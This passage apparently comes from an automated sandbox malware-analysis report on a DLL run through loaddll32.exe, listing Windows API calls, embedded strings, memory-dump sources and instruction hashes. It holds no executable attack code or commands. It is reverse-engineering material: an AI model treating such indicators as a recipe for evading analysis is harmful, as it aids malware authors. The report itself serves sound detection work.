                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                      • Opcode ID: 7c4214a6ebeade0669265e43d05489b91759203f35bb897c5666a0b913dc4fc6
                                                                                                                                                                                      • Instruction ID: c0f6d0b07c8ddf970c80541233748c336f61c250a1fe5c08a6b83009f2c98797
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c4214a6ebeade0669265e43d05489b91759203f35bb897c5666a0b913dc4fc6
                                                                                                                                                                                      • Instruction Fuzzy Hash: DE016D7310DB119DAB612AF67C4C55A36ACDF5737D330022BEA10642D5FF42C8038E80
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 6E9EC510: GetTickCount64.KERNEL32 ref: 6E9EC517
                                                                                                                                                                                      • GetTickCount64.KERNEL32 ref: 6E9EBE96
                                                                                                                                                                                      • GetTickCount64.KERNEL32 ref: 6E9EBEB4
                                                                                                                                                                                      • GetTickCount64.KERNEL32 ref: 6E9EBECD
                                                                                                                                                                                      • GetTickCount64.KERNEL32 ref: 6E9EBECF
                                                                                                                                                                                      • GetTickCount64.KERNEL32 ref: 6E9EBED6
                                                                                                                                                                                      • GetTickCount64.KERNEL32 ref: 6E9EBEF4
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Count64Tick
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1927824332-0
                                                                                                                                                                                      • Opcode ID: f5b466110fc698a85c4d7762e04354ee762cc00c60867c208b1dd87043a6da46
                                                                                                                                                                                      • Instruction ID: 5f89fe14493ba06d1ef4618cf30142cf3b62051c2728c86830ffb08196c525c5
                                                                                                                                                                                      • Opcode Fuzzy Hash: f5b466110fc698a85c4d7762e04354ee762cc00c60867c208b1dd87043a6da46
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4501D613C24F188DD213B979A84111AA67C6FE73E0B19C753D1463A005FF9044E34AD2
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • 'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6E9D6B54
                                                                                                                                                                                      • _!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool, xrefs: 6E9D6BAA, 6E9D6BE5
                                                                                                                                                                                      • {invalid syntax}, xrefs: 6E9D6B84
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __aulldiv__aullrem
                                                                                                                                                                                      • String ID: 'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool${invalid syntax}
                                                                                                                                                                                      • API String ID: 3839614884-2364648981
                                                                                                                                                                                      • Opcode ID: 5a6d0097d096ac20da771449ba4a4db1be0ee7e187d67349be937cc64d2cd192
                                                                                                                                                                                      • Instruction ID: 47f13096d41d37f2ec7a0a974dddb8be082cf7bfb92659c327e887452f66a505
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a6d0097d096ac20da771449ba4a4db1be0ee7e187d67349be937cc64d2cd192
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D41883571C6204BD3149AB8C840B7AB7D9DFD5704F108C3EE9899F3C2E668C859CB92
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000,00000001,6E9DC746), ref: 6E9DD00B
                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000,00000001,6E9DC746), ref: 6E9DD023
                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000), ref: 6E9DD043
                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000), ref: 6E9DD063
                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 6E9DD076
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00720000,00000000,0000000C), ref: 6E9DD089
                                                                                                                                                                                      • TlsSetValue.KERNEL32(00000000,00000000,00720000,00000000,0000000C), ref: 6E9DD0B6
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Value$Heap$AllocProcess
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3559649508-0
                                                                                                                                                                                      • Opcode ID: 989d43833420a3ebe3e20cf2910c93b9ddfa3130c92b4a0bffaebffce5114eb0
                                                                                                                                                                                      • Instruction ID: 2789e1b6f6b0cb8852eda3a0e9bd514e6f2fa3dd5afe3516047c350c6e135b1a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 989d43833420a3ebe3e20cf2910c93b9ddfa3130c92b4a0bffaebffce5114eb0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 02118EF0604A26CBEB504BF5D854B563A9CAFD3244F098D24D906EF740DB75D84ACEB8
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      • C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6E9F358D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: C:\Windows\SYSTEM32\loaddll32.exe
                                                                                                                                                                                      • API String ID: 0-1872383224
                                                                                                                                                                                      • Opcode ID: 9e1f48e7d4c4ccf22c0f8f9b8bbbe6ea4e9bc763199a1c945c8889421534befe
                                                                                                                                                                                      • Instruction ID: 19deb51f2fdde3204254b1a079408ac96241eb302b23675fe95894fbbb53e6f1
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e1f48e7d4c4ccf22c0f8f9b8bbbe6ea4e9bc763199a1c945c8889421534befe
                                                                                                                                                                                      • Instruction Fuzzy Hash: A8219F71604209EFDB00DFF6D84988A77ADEF813687014928F81997350DB38E8528FA2
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,6E9F04E3,00000000,?,00000001,00000000,?,6E9F055A,00000001,FlsFree,6EA26184,FlsFree,00000000), ref: 6E9F04B2
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                      • API String ID: 3664257935-2084034818
                                                                                                                                                                                      • Opcode ID: 00b027a101c6163f9a191628d729f3ac4e33b58fff992557347aa8226a89624d
                                                                                                                                                                                      • Instruction ID: ede82a63810032cfd94028958bcf157e5b3400b1c6fdbf509f074fc4d85b75c4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 00b027a101c6163f9a191628d729f3ac4e33b58fff992557347aa8226a89624d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D11C172A55621EFDF528EA99840B4D33ACAF02770F254520ED15FB380F670ED028BD4
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,3DD15BED,00000000,?,00000000,6E9F9B33,000000FF,?,6E9F127D,?,?,6E9F1251,?), ref: 6E9F1322
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E9F1334
                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,6E9F9B33,000000FF,?,6E9F127D,?,?,6E9F1251,?), ref: 6E9F1356
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                      • Opcode ID: 87507f647e4f75757d05af82b33c59e87c7f6e7d8424131cf5b9854ea2fd4d24
                                                                                                                                                                                      • Instruction ID: 832521a21cb1f3483bba80a94e7463bcf8f9857cfab4411e32900eb178574140
                                                                                                                                                                                      • Opcode Fuzzy Hash: 87507f647e4f75757d05af82b33c59e87c7f6e7d8424131cf5b9854ea2fd4d24
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8201A2B2904959EFDF018F90DC04FAEBBB8FF46711F044525E822A2780DBB49905CF90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32), ref: 6E9DC285
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 6E9DC295
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                      • String ID: SetThreadDescription$kernel32
                                                                                                                                                                                      • API String ID: 1646373207-1950310818
                                                                                                                                                                                      • Opcode ID: d36d8dcef8aedaada3ce5e118300fe138664c48df6cc1a015d590023ec3820ec
                                                                                                                                                                                      • Instruction ID: 01de7d2bc949015b582889094ddc131455a38afbd605a673e6848eeafbaf9a5f
                                                                                                                                                                                      • Opcode Fuzzy Hash: d36d8dcef8aedaada3ce5e118300fe138664c48df6cc1a015d590023ec3820ec
                                                                                                                                                                                      • Instruction Fuzzy Hash: 75B09BF05445015EDE505EF1695C65535187FD320130848906117E5101DED4C040E979
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll), ref: 6E9DC2C5
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 6E9DC2D5
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                      • String ID: NtWaitForKeyedEvent$ntdll
                                                                                                                                                                                      • API String ID: 1646373207-2815205136
                                                                                                                                                                                      • Opcode ID: 2567cf3143bbee6c6a267ab663b8f86852c9bfccd072a35d560b02b0679a2bbb
                                                                                                                                                                                      • Instruction ID: 36f7811989c865ab2471f0784080f69ce20273c68617227ec6e23b6c456a1752
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2567cf3143bbee6c6a267ab663b8f86852c9bfccd072a35d560b02b0679a2bbb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 97B092F0A08E016EAE906AF16AACA563A28BFA32013484460A117E9100EA64C0409DA9
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll), ref: 6E9DC2E5
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtReleaseKeyedEvent), ref: 6E9DC2F5
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                      • String ID: NtReleaseKeyedEvent$ntdll
                                                                                                                                                                                      • API String ID: 1646373207-31681898
                                                                                                                                                                                      • Opcode ID: 9d9fd1deb0bba7a67472b4c3fe000f9e208f0f9fc4f0b5d07f57bcadbc5cbfe9
                                                                                                                                                                                      • Instruction ID: 5fb1955b7fb730941ee7d99e30744c02f0b69b26dec777896de567a8f5b1031f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d9fd1deb0bba7a67472b4c3fe000f9e208f0f9fc4f0b5d07f57bcadbc5cbfe9
                                                                                                                                                                                      • Instruction Fuzzy Hash: DDB092F0A08D026EDE606AF26AACA563918BF932013084460A123F9200FA64C040AD29
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32), ref: 6E9DC265
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6E9DC275
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                      • String ID: GetSystemTimePreciseAsFileTime$kernel32
                                                                                                                                                                                      • API String ID: 1646373207-392834919
                                                                                                                                                                                      • Opcode ID: 73f954d8b18c3c2ff75f2e97336ecf9c471554001dccd7c784e67cfa26634a0e
                                                                                                                                                                                      • Instruction ID: ab31b927c242950f452cb805cea270d97acd37c98d4aad44cd1972591c14a294
                                                                                                                                                                                      • Opcode Fuzzy Hash: 73f954d8b18c3c2ff75f2e97336ecf9c471554001dccd7c784e67cfa26634a0e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 07B092F06089016EEE606EF16AACA563919BFA320130848A0A213E9140EAA4C080AD29
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll), ref: 6E9DC305
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtCreateKeyedEvent), ref: 6E9DC315
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                      • String ID: NtCreateKeyedEvent$ntdll
                                                                                                                                                                                      • API String ID: 1646373207-1373576770
                                                                                                                                                                                      • Opcode ID: 3b1d776f789b761b53127d30f3edc0fecbdf7fa9857315e3a7455323824ae399
                                                                                                                                                                                      • Instruction ID: a5ad60ef05523f8a682a35c1326ec2f7e87b24fa4a5e3d93457fae3468809b8b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b1d776f789b761b53127d30f3edc0fecbdf7fa9857315e3a7455323824ae399
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8BB092F0A08D016F9E50AAF17AACA563918FF632823488460A423E9116EA64C0409D29
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetConsoleOutputCP.KERNEL32(3DD15BED,?,00000000,?), ref: 6E9F67AC
                                                                                                                                                                                        • Part of subcall function 6E9F4073: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6E9F61E2,?,00000000,-00000008), ref: 6E9F411F
                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6E9F6A07
                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E9F6A4F
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6E9F6AF2
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2112829910-0
                                                                                                                                                                                      • Opcode ID: 9f516e9493479bb50b0352ea94f5514d04b3832686e0480147172125d8277487
                                                                                                                                                                                      • Instruction ID: 5506f209d62c9907507c78856d083e4f5775ccb0ebab0519856a80185eabab86
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f516e9493479bb50b0352ea94f5514d04b3832686e0480147172125d8277487
                                                                                                                                                                                      • Instruction Fuzzy Hash: 06D14AB5D14259EFCB01CFE8C8809EDBBB4EF49314F18852AE855AB242D730E942CF90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • WriteConsoleW.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 6E9E2601
                                                                                                                                                                                      • WriteConsoleW.KERNEL32(?,?,00000001,?,00000000,?,?,?), ref: 6E9E2653
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?), ref: 6E9E265D
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?), ref: 6E9E26C5
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ConsoleErrorLastWrite
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4006445483-0
                                                                                                                                                                                      • Opcode ID: 83fae12f1a04bc72684db611cb5e182b11498574392b1fb722dfff617e7f4fe1
                                                                                                                                                                                      • Instruction ID: 33b35dd145ee2cfd4fc660b3f586017aaf1a75bf032ef4e2b8d7a477d40f8016
                                                                                                                                                                                      • Opcode Fuzzy Hash: 83fae12f1a04bc72684db611cb5e182b11498574392b1fb722dfff617e7f4fe1
                                                                                                                                                                                      • Instruction Fuzzy Hash: B361AB31A083178BE7068E99CC6076E77A6EFC5704F048939E69587B84FAB1D8018E92
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1740715915-0
                                                                                                                                                                                      • Opcode ID: bbc3aa02874f919a5562fc59bf0e93d19a0289ffcaaf288ffccd832525a6e6ad
                                                                                                                                                                                      • Instruction ID: 2af92cfe98e7f60a8e59c218fc012d072fd3007263852d4a65d99e9386d3f961
